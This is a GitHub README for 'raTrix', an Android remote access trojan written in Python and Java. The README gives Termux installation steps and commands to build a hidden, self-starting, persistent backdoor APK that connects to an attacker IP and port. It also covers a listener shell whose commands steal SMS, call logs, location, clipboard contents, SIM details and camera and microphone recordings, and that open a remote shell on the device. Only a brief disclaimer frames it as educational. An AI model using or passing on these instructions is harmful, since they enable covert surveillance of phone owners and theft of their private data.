Skip to content

Latest commit

 

History

History
92 lines (81 loc) · 3.14 KB

README.md

File metadata and controls

92 lines (81 loc) · 3.14 KB

ratrix picture

raTrix 🐀

raTrix is a powerful Android administration tool designed for Linux systems. It utilizes Python on the client-side and Java on the server-side to provide a robust and efficient management solution.

FEATURE FOR raTrix

  • light apk
  • shell and build mode
  • it run background 24hrs
  • it show device info,MAC Adress, device ip, simcard info
  • Auto start backdoor
  • sms viewing and callLogs viewing
  • all port-forwading
  • microphone checking
  • camera checking
  • full persistent
  • Easy To use
  • no icon

installation on termux

pkg update
pkg upgrade
pkg install git
pkg install python python2 python3
pkg install openjdk-17
pkg install aapt
git clone https://github.com/MrpasswordTz/raTrix.git
cd raTrix

usages building mode

python3 raTrix.py --build [models]
modules:
 -i, --ip                Attacker IP address (required)
    -p, --port              Attacker port number (required)
    -o, --output            Name for the apk file (optional)
    -icon, --icon           Visible icon after installing apk (by default set to hidden)

EXample: python3 raTrix.py --build -i 192.168.16.216 -p 443 -o sudo.apk

Usages SHELL mode

Usage:
  python3 raTrix.py --shell [modules]
  modules:
    -i, --ip                Listner IP address
    -p, --port              Listner port number

Example: python3 raTrix.py --shell -i 192.168.16.216 -p 443

Commands in shell mode

    deviceInfo                 --> returns basic info of the device
    camList                    --> returns cameraID  
    takepic [cameraID]         --> Takes picture from camera
    startVideo [cameraID]      --> starts recording the video
    stopVideo                  --> stop recording the video and return the video file
    startAudio                 --> starts recording the audio
    stopAudio                  --> stop recording the audio
    getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file 
    getCallLogs                --> returns call logs in a file
    shell                      --> starts a sh shell of the device
    vibrate [number_of_times]  --> vibrate the device number of time
    getLocation                --> return the current location of the device
    getIP                      --> returns the ip of the device
    getSimDetails              --> returns the details of all sim of the device
    clear                      --> clears the screen
    getClipData                --> return the current saved text from the clipboard
    getMACAddress              --> returns the mac address of the device
    exit                       --> exit the interpreter

Examples

in buliding mode(generating apk)

python3 raTrix.py -i 192.169.120.34 -p 8080 -o sudo.apk

in shell mode (listening)

python3 raTrix.py --shell -i 192.169.120.34 -p 8080

Disclaimer

This tool is only for educational purposes, i will not be responsible for any Damage

TOOL IS UNDER CONSTRUCTION